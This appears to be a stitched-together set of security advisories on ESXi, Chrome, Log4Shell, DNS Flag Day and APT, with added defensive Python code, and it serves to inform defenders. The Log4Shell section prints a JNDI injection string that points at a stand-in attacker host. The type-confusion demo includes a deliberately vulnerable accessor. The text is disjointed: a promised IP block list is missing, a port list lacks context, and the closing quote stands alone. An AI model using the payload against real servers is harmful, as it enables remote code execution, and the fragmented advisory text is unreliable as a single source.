There are reports of an ongoing ransomware campaign actively exploiting a vulnerability (CVE-2021-21974) in unpatched VMware ESXi servers.
Successful exploitation could allow an attacker who can reach port 427 from the same network segment as the host to achieve remote code execution by triggering a heap overflow in the OpenSLP service.
The following versions of the products are affected by the aforementioned vulnerability:
• ESXi versions 7.x earlier than ESXi70U1c-17325551
• ESXi versions 6.7.x earlier than ESXi670-202102401-SG
• ESXi versions 6.5.x earlier than ESXi650-202102101-SG
Users and administrators of affected product versions are advised to upgrade to the fixed builds immediately. As a precaution, a full system scan should also be performed for any signs of compromise. Administrators are also advised to assess whether the OpenSLP service, which listens on port 427 (the port targeted by the campaign), can be disabled without disrupting operations; hosts that do not need SLP for CIM client discovery can usually run without it.
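To check a fleet of hosts against the fixed builds listed above, the following added example (not part of the advisory) parses the first line of `vmware -vl` output and compares the build number against the fixed build for that branch. The 7.0 build (17325551) is taken from the advisory; the 6.7 and 6.5 build numbers are assumptions that correspond to the named patch bundles and must be confirmed against VMware's release notes. The sample outputs in the `__main__` block are constructed.

```python
import re

# Fixed builds per ESXi branch. 7.0's build (17325551) is the one named in the advisory
# (ESXi70U1c-17325551). The 6.7 and 6.5 builds are ASSUMED here to correspond to
# ESXi670-202102401-SG and ESXi650-202102101-SG; confirm them against VMware's patch
# release notes before relying on this table.
FIXED_BUILDS = {
    "7.0": 17325551,
    "6.7": 17499825,  # assumed, verify
    "6.5": 17477841,  # assumed, verify
}

# First line of `vmware -vl`, e.g. "VMware ESXi 6.7.0 build-17167734"
VERSION_RE = re.compile(r"VMware ESXi (\d+\.\d+)\.\d+ build-(\d+)")


def parse_vmware_vl(output):
    """Return (branch, build) from `vmware -vl` output; raise if it is not ESXi output."""
    m = VERSION_RE.search(output)
    if not m:
        raise ValueError("unrecognised `vmware -vl` output: %r" % output)
    return m.group(1), int(m.group(2))


def assess(output):
    """Classify a host as 'patched', 'vulnerable' or 'unknown' (branch not in the table)."""
    branch, build = parse_vmware_vl(output)
    fixed = FIXED_BUILDS.get(branch)
    if fixed is None:
        return "unknown"  # branch not covered by the table (e.g. 6.0): review manually
    return "patched" if build >= fixed else "vulnerable"


def assess_fleet(outputs):
    """outputs: {hostname: text of `vmware -vl`}; returns {hostname: status}."""
    return {host: assess(text) for host, text in outputs.items()}


if __name__ == "__main__":
    # Constructed sample outputs; in practice collect them over SSH or from the host shell.
    SAMPLE = {
        "esx01": "VMware ESXi 6.7.0 build-17167734\nVMware ESXi 6.7.0 Update 3\n",
        "esx02": "VMware ESXi 7.0.1 build-17325551\nVMware ESXi 7.0 Update 1\n",
        "esx03": "VMware ESXi 6.0.0 build-15517548\nVMware ESXi 6.0.0 Update 3\n",
    }
    for host, status in assess_fleet(SAMPLE).items():
        print(host, status)
```

A host reported as "patched" can still be running the SLP service; the version check only tells you the heap-overflow fix is present, so pair it with a check that port 427 is closed or the service is stopped on hosts that do not need it.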
Users and administrators may also wish to configure their firewall rules to block connections to the following IP addresses, reported to be carrying out the attacks:
Type confusion is a class of bug in which an application allocates or initialises an object as one "type" but is tricked into treating it as a different "type". Because the two types lay out memory differently, fields are misinterpreted (a number may be read as a length or a pointer), which corrupts the application's memory and may allow an attacker to run arbitrary code inside the application.
No further technical details about the bug have been published by Google.
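The mechanics of a type confusion bug, as an added example that is not from Google's advisory and has nothing to do with the specific Chrome bug: two constructed object layouts share a leading type tag, an attacker-controlled NumberObj is handed to code expecting a StringObj, and the number's value is read as the string's length, steering a read into whatever sits next to the object in memory. The hardened version checks the tag before reinterpreting the bytes and clamps the length to the field. The "heap cell" and the secret are constructed for the example.

```python
import ctypes

TAG_STRING, TAG_NUMBER = 1, 2
CHARS_LEN = 8   # inline character storage of a StringObj
CELL_SIZE = 24  # constructed "heap cell": one object followed by 16 bytes of neighbouring data


class StringObj(ctypes.Structure):
    """Tag, length, then 8 inline bytes (16 bytes total)."""
    _fields_ = [("tag", ctypes.c_uint32),
                ("length", ctypes.c_uint32),
                ("chars", ctypes.c_char * CHARS_LEN)]


class NumberObj(ctypes.Structure):
    """Tag then a 32-bit value (8 bytes total). `value` sits where StringObj.length sits."""
    _fields_ = [("tag", ctypes.c_uint32),
                ("value", ctypes.c_uint32)]


def cell_with_string(text):
    cell = ctypes.create_string_buffer(CELL_SIZE)
    s = StringObj.from_buffer(cell)
    s.tag, s.length, s.chars = TAG_STRING, len(text), text
    return cell


def cell_with_number(value, neighbour):
    """A NumberObj with an attacker-chosen value, followed by unrelated data (the 'neighbour')."""
    cell = ctypes.create_string_buffer(CELL_SIZE)
    n = NumberObj.from_buffer(cell)
    n.tag, n.value = TAG_NUMBER, value
    ctypes.memmove(ctypes.addressof(cell) + ctypes.sizeof(NumberObj), neighbour, len(neighbour))
    return cell


def string_bytes_unchecked(cell):
    """VULNERABLE: assumes the cell holds a StringObj without looking at the tag."""
    s = StringObj.from_buffer(cell)
    return ctypes.string_at(ctypes.addressof(s) + StringObj.chars.offset, s.length)


def string_bytes_checked(cell):
    """HARDENED: verify the type tag before reinterpreting, and clamp the length to the field."""
    if ctypes.c_uint32.from_buffer(cell).value != TAG_STRING:
        raise TypeError("object is not a string")
    s = StringObj.from_buffer(cell)
    return ctypes.string_at(ctypes.addressof(s) + StringObj.chars.offset, min(s.length, CHARS_LEN))


def rejects(cell):
    """True if the hardened accessor refuses the object."""
    try:
        string_bytes_checked(cell)
        return False
    except TypeError:
        return True


if __name__ == "__main__":
    # Constructed scenario: the attacker controls a NumberObj with value 16, and a 16-byte
    # secret happens to sit right after it. Confusing the number for a string turns `value`
    # into `length` and `chars` into the start of the secret.
    evil = cell_with_number(16, b"SESSION-TOKEN-42")
    print(string_bytes_unchecked(evil))  # the secret leaks
    print(rejects(evil))                 # the tag check stops it
```

In a JIT-compiled engine the "tag check" is usually a type guard the optimiser decided it could drop; a type confusion bug is exactly a case where that decision was wrong, and the confused field is typically a length or a pointer, so the consequence is an out-of-bounds read or write rather than a clean exception.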
Google Chrome users on Windows, Mac and Linux are advised to update to Chrome 99.0.4844.84 immediately via Chrome menu > Help > About Google Chrome (and relaunch the browser so the update takes effect); Android users may obtain Chrome 99 (99.0.4844.88) from the Google Play Store.
Apache Log4j has a serious unauthenticated remote code execution (RCE) vulnerability (CVE-2021-44228, "Log4Shell") which has just been disclosed. Exploit code has been released and the vulnerability is being actively exploited in the wild. By getting a specially crafted string, typically a JNDI lookup such as "${jndi:ldap://attacker-host/x}", into any value that the application logs via Log4j (a User-Agent header, a username, a search term), an attacker can make the server fetch and execute code from a remote server. This can lead to a complete compromise of the server.
What versions are vulnerable?
Any software that embeds Apache Log4j 2 (log4j-core) at a version from 2.0 (specifically 2.0-beta9) up to and including 2.14.1. This includes copies bundled inside wars, ears and fat jars, and third-party products that ship Log4j, not only your own direct dependencies.
What do I need to do?
A. Servers running custom Java application/services
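A first step for servers running custom Java applications is to find every log4j-core on the box and determine its version. The following added example (not part of the advisory) walks a directory tree, opens each .jar/.war/.ear, recurses into archives nested inside them, reads the version from log4j-core's Maven pom.properties, and reports whether it is in the 2.0 to 2.14.1 range. It also checks for the JndiLookup class, since deleting that class from the jar is the published mitigation for deployments that cannot upgrade immediately. The archives built by demo() are constructed stand-ins with the same layout as a real log4j-core jar, not real Log4j builds.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear")


def is_vulnerable_version(version):
    """True for log4j-core 2.0 (incl. 2.0-beta9) through 2.14.1, the range in the advisory."""
    m = re.match(r"2\.(\d+)(?:\.(\d+))?", version)
    return bool(m) and (int(m.group(1)), int(m.group(2) or 0)) <= (14, 1)


def _inspect(z, label, findings):
    names = set(z.namelist())
    version = None
    if POM_PROPS in names:
        for line in z.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if version is not None:
        has_jndi = JNDI_CLASS in names
        findings[label] = {"version": version, "jndi_lookup_present": has_jndi,
                           "vulnerable": is_vulnerable_version(version) and has_jndi}
    for name in names:  # recurse into jars bundled in wars/ears/fat jars
        if name.endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(z.read(name))) as inner:
                    _inspect(inner, label + "!" + name, findings)
            except zipfile.BadZipFile:
                pass


def scan(root):
    """Map archive location -> finding for every log4j-core found under root (nested included)."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in ARCHIVES:
            try:
                with zipfile.ZipFile(path) as z:
                    _inspect(z, path.relative_to(root).as_posix(), findings)
            except zipfile.BadZipFile:
                pass
    return findings


def write_sample_archive(path_or_buf, version=None, with_jndi=True, extra=None):
    """Constructed test archive mimicking log4j-core's layout; not a real Log4j build."""
    with zipfile.ZipFile(path_or_buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            z.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                                  f"artifactId=log4j-core\n")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        for name, data in (extra or {}).items():
            z.writestr(name, data)


def demo():
    """Build a constructed deployment tree, scan it, and return {location: vulnerable?}."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "lib").mkdir()
        write_sample_archive(root / "lib" / "log4j-core-2.14.1.jar", "2.14.1")
        write_sample_archive(root / "lib" / "log4j-core-2.14.1-stripped.jar", "2.14.1", with_jndi=False)
        write_sample_archive(root / "lib" / "log4j-core-2.17.1.jar", "2.17.1")
        write_sample_archive(root / "lib" / "other-lib.jar", None, with_jndi=False)
        inner = io.BytesIO()
        write_sample_archive(inner, "2.13.3")
        write_sample_archive(root / "app.war", None, with_jndi=False,
                             extra={"WEB-INF/lib/log4j-core-2.13.3.jar": inner.getvalue()})
        return {loc: f["vulnerable"] for loc, f in scan(root).items()}


if __name__ == "__main__":
    for location, vulnerable in demo().items():
        print(("VULNERABLE " if vulnerable else "ok         ") + location)
```

Run scan() against application directories and servlet-container deployment roots; a jar whose JndiLookup class has been removed is reported as not vulnerable, but an upgrade is still the proper fix because the stripped jar will be replaced by the next deployment that bundles an unpatched copy.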
The default ports are:
• PBSA service, HTTP: 9000
• PBSA service, HTTPS: 9143
• PBSA data collector, HTTPS: 9343
• PBSA MonetDB: 9200
• Envision Tomcat-8 server: 9080
• Envision, HTTPS: 9443
• PBSA MongoDB: 9700
Domain Name System (DNS) infrastructure operators and Internet service providers are taking part in the first DNS Flag Day on 1 February 2019. This is a global initiative to promote the use of Extension Mechanisms for DNS (EDNS): participating DNS software vendors and service providers, such as Google and Cloudflare, will remove the workarounds their resolvers use to cope with non-standard, EDNS non-compliant authoritative servers, so queries to such servers will no longer be retried without EDNS.
Affected: authoritative nameservers that do not support EDNS or that drop or reject queries carrying an EDNS OPT record, and nameservers with proprietary DNS implementations, e.g. legacy load-balancing appliances.
Internet users may experience slowness, or be unable to reach domains whose authoritative nameservers are affected, for example when browsing their websites or sending email to them.
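What "EDNS compliance" means on the wire, as an added example that is not part of the advisory: an EDNS query carries an OPT pseudo-record (type 41) in the additional section, and a compliant server echoes an OPT record back; a server that answers FORMERR, answers without the OPT record, or stays silent is the kind of server the Flag Day workarounds used to paper over. The code builds the query, parses a reply, classifies it, and includes a constructed reply builder so the classification runs offline; probe() is the live UDP check for your own authoritative servers.

```python
import random
import socket
import struct

TYPE_SOA, TYPE_OPT, CLASS_IN = 6, 41, 1


def encode_name(name):
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def skip_name(msg, off):
    """Advance past a (possibly compressed) name; a pointer (top two bits set) ends it."""
    while True:
        ln = msg[off]
        if ln == 0:
            return off + 1
        if ln & 0xC0 == 0xC0:
            return off + 2
        off += 1 + ln


def build_query(name, qtype=TYPE_SOA, edns=True, udp_size=1232, txid=None):
    """Non-recursive query (RD=0, as sent to an authoritative server), with or without an OPT RR."""
    txid = random.randrange(0x10000) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 1 if edns else 0)
    question = encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    # OPT pseudo-RR: root name, TYPE 41, CLASS = sender's UDP payload size,
    # TTL = ext-rcode(8) | version(8) | flags(16), no RDATA.
    opt = b"\x00" + struct.pack("!HHIH", TYPE_OPT, udp_size, 0, 0) if edns else b""
    return header + question + opt


def parse_response(msg):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(msg, off) + 4
    opt = None
    for _ in range(an + ns + ar):
        off = skip_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10 + rdlen
        if rtype == TYPE_OPT:
            opt = (rclass, ttl)
    return {"txid": txid, "rcode": flags & 0xF, "edns": opt is not None,
            "edns_version": (opt[1] >> 16) & 0xFF if opt else None,
            "udp_size": opt[0] if opt else None}


def classify(resp):
    """Flag Day outcome for a reply to an EDNS query (resp is None on timeout)."""
    if resp is None:
        return "timeout"     # no reply: post Flag Day resolvers no longer retry without EDNS
    if resp["rcode"] == 1:
        return "formerr"     # server rejects the OPT record: non-compliant
    if not resp["edns"]:
        return "no-opt"      # answered but silently dropped EDNS: non-compliant
    return "compliant" if resp["edns_version"] == 0 else "bad-version"


def build_response(query, rcode=0, include_opt=True):
    """Constructed server reply for offline testing: echoes the question, no answer records."""
    qend = skip_name(query, 12) + 4
    header = query[:2] + struct.pack("!HHHHH", 0x8400 | rcode, 1, 0, 0, 1 if include_opt else 0)
    opt = b"\x00" + struct.pack("!HHIH", TYPE_OPT, 4096, 0, 0) if include_opt else b""
    return header + query[12:qend] + opt


def probe(server, name, timeout=3.0):
    """Live check (not exercised offline): send the EDNS query over UDP and classify the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name), (server, 53))
        try:
            return classify(parse_response(s.recv(4096)))
        except socket.timeout:
            return classify(None)
```

Probe every authoritative server for a zone, not just the primary, and test from outside your own network as well: a firewall or load balancer in front of the nameserver can strip or block EDNS even when the nameserver software itself is compliant.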
A vulnerability (CVE-2019-3462) has been discovered in the Advanced Package Tool (APT). Successful exploitation could result in arbitrary code execution as the privileged "root" user on affected Linux systems. APT is a widely used utility that handles installation, update, upgrade and removal of software across many Linux distributions. The flaw lies in APT's HTTP transport, which did not properly sanitise redirect responses, so a network attacker in a man-in-the-middle position (or a malicious mirror) could inject content into APT's internal messages and have a crafted package installed. This vulnerability has been given a Common Vulnerability Scoring System (CVSS) version 3 base score of 8.1 out of 10.
APT versions 1.4.8 and older (the fix in Debian stretch is 1.4.9). Other distributions ship their own APT branches, and newer versions such as those in Ubuntu releases were also affected and patched separately, so check your distribution's advisory for the fixed package version.
Successful exploitation of this vulnerability could lead to a full compromise of a user’s machine, allowing an attacker to perform malicious activities such as unauthorised installation of programs, creation of rogue administrator accounts and alteration of data.
Affected users and system administrators of Debian, Ubuntu and other Linux distributions are advised to install the security updates immediately. Because the update itself is fetched with the vulnerable APT, the distribution advisories recommend disabling HTTP redirects while doing so, i.e. apt -o Acquire::http::AllowRedirect=false update followed by apt -o Acquire::http::AllowRedirect=false upgrade; mirrors that rely on redirects may fail with this setting, in which case download the updated apt package by other means and verify its signature before installing.
“Crucially, because the BMC has the ability to install the operating system, it can disrupt the process that boots the operating system – and fetch potentially malicious implant code, maybe even over the Internet.”